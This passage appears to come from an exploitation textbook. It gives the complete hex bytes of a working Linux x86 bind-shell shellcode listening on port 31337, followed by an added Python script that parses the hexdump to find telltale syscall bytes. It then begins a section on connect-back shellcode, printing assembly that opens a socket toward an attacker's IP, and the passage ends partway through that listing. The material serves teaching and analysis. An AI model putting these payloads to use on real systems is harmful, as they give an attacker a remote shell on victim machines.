reader@hacking:~/booksrc $ nasm bind_shell.s
reader@hacking:~/booksrc $ hexdump -C bind_shell
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |.jfXCRfhzifS..j.|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV.....fCCSV....|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |.fCRRV.....j.Y.?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |..Iy...Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in..R..S....|
0000005c
reader@hacking:~/booksrc $ diff bind_shell portbinding_shellcode
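As an added example that is not from the book, here is a small Python script that re-reads the hexdump -C listing above and pulls out what an analyst triaging an unknown blob would want first: the number of int 0x80 sites, whether the socketcall (push BYTE 0x66; pop eax) and execve (mov al, 0xb) setup bytes are present, and the port pushed with push WORD, read in network byte order. It also checks the offset on every hexdump line, so a row lost in a scan or paste is reported instead of silently producing the wrong bytes. The shell_string versus shell_fragments pair shows why a literal "/bin/sh" signature misses this code: the string is pushed as two DWORDs, "//sh" then "/bin", and never appears contiguously in the bytes. The pattern constants and function names are this example's own, not the book's.

```python
# Constructed input for this example: the `hexdump -C bind_shell` listing from
# the page, pasted as printed (the scan collapsed hexdump's double spaces,
# which the parser below tolerates).
BIND_SHELL_HEXDUMP = """\
00000000 6a 66 58 99 31 db 43 52 6a 01 6a 02 89 e1 cd 80 |jfX.1.CRj.j.....|
00000010 96 6a 66 58 43 52 66 68 7a 69 66 53 89 e1 6a 10 |.jfXCRfhzifS..j.|
00000020 51 56 89 e1 cd 80 b0 66 43 43 53 56 89 e1 cd 80 |QV.....fCCSV....|
00000030 b0 66 43 52 52 56 89 e1 cd 80 93 6a 02 59 b0 3f |.fCRRV.....j.Y.?|
00000040 cd 80 49 79 f9 b0 0b 52 68 2f 2f 73 68 68 2f 62 |..Iy...Rh//shh/b|
00000050 69 6e 89 e3 52 89 e2 53 89 e1 cd 80 |in..R..S....|
0000005c
"""

INT80 = b"\xcd\x80"            # int 0x80: one Linux syscall site
SOCKETCALL = b"\x6a\x66\x58"   # push BYTE 0x66 ; pop eax   (socketcall, #102)
EXECVE = b"\xb0\x0b"           # mov al, 0x0b               (execve, #11)
PUSH_WORD = b"\x66\x68"        # push WORD imm16


def parse_hexdump(text):
    """Turn `hexdump -C` output back into bytes.

    Each line's offset is compared with the byte count parsed so far, so a
    row dropped or duplicated by a scan or copy-paste raises ValueError
    instead of yielding a plausible-looking but wrong blob.  A lone '*'
    line (hexdump's marker for repeated rows) is expanded from the row
    before it.
    """
    data = bytearray()
    last_row = b""
    squeezed = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "*":
            squeezed = True
            continue
        fields = line.split("|", 1)[0].split()   # drop the ASCII column
        offset = int(fields[0], 16)
        if squeezed:
            if not last_row:
                raise ValueError("'*' before any data row")
            while len(data) < offset:
                data += last_row
            squeezed = False
        if offset != len(data):
            raise ValueError(f"offset {offset:#x} but {len(data)} bytes parsed so far")
        if len(fields) == 1:            # trailing line carries only the total length
            break
        last_row = bytes(int(h, 16) for h in fields[1:])
        data += last_row
    return bytes(data)


def pushed_words(blob):
    """16-bit immediates pushed with `push WORD`, read big-endian: that is
    how a port number sits inside sockaddr_in, so bytes 7a 69 give 31337."""
    words = []
    i = blob.find(PUSH_WORD)
    while i != -1 and i + 4 <= len(blob):
        words.append(int.from_bytes(blob[i + 2:i + 4], "big"))
        i = blob.find(PUSH_WORD, i + 1)
    return words


def summarize(blob):
    """Facts an analyst pulls from a raw blob before reading the disassembly.
    `syscall_sites` counts int 0x80 instructions, not runtime calls (the dup2
    site in this blob runs three times inside a loop)."""
    return {
        "length": len(blob),
        "syscall_sites": blob.count(INT80),
        "socketcall_setup": SOCKETCALL in blob,
        "execve_setup": EXECVE in blob,
        "shell_string": b"/bin//sh" in blob,
        "shell_fragments": b"/bin" in blob and b"//sh" in blob,
        "pushed_words": pushed_words(blob),
    }


if __name__ == "__main__":
    blob = parse_hexdump(BIND_SHELL_HEXDUMP)
    for key, value in summarize(blob).items():
        print(f"{key:17} {value}")
```

Running the script prints the summary for the 92-byte blob; the same functions work on any hexdump -C capture, so the offset check is the part worth keeping when the listing comes from a scanned page rather than a live terminal.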
0x550 Connect-Back Shellcode
Port-binding shellcode is easily foiled by firewalls. Most firewalls will block
incoming connections, except for certain ports with known services. This limits
the user's exposure and will prevent port-binding shellcode from receiving a
connection. Software firewalls are now so common that port-bind shellcode
has little chance of actually working in the wild.
However, firewalls typically do not filter outbound connections, since that
would hinder usability. From inside the firewall, a user should be able to access
any web page or make any other outbound connections. This means that if
the shellcode initiates the outbound connection, most firewalls will allow it.
Instead of waiting for a connection from an attacker, connect-back shellcode
initiates a TCP connection back to the attacker's IP address. Opening a
TCP connection only requires a call to socket() and a call to connect(). This is
very similar to the bind-port shellcode, since the socket call is exactly the same
and the connect() call takes the same type of arguments as bind(). The following
connect-back shellcode was made from the bind-port shellcode with a few
modifications (shown in bold).
connectback_shell.s
BITS 32
; s = socket(2, 1, 0)
push BYTE 0x66 ; socketcall is syscall #102 (0x66).
pop eax
cdq ; Zero out edx for use as a null DWORD later.
xor ebx, ebx ; ebx is the type of socketcall.
inc ebx ; 1 = SYS_SOCKET = socket()
push edx ; Build arg array: { protocol = 0,
push BYTE 0x1 ; (in reverse) SOCK_STREAM = 1,
push BYTE 0x2 ; AF_INET = 2 }
mov ecx, esp ; ecx = ptr to argument array
int 0x80 ; After syscall, eax has socket file descriptor.
xchg esi, eax ; Save socket FD in esi for later.
; connect(s, [2, 31337, <IP address>], 16)
push BYTE 0x66 ; socketcall (syscall #102)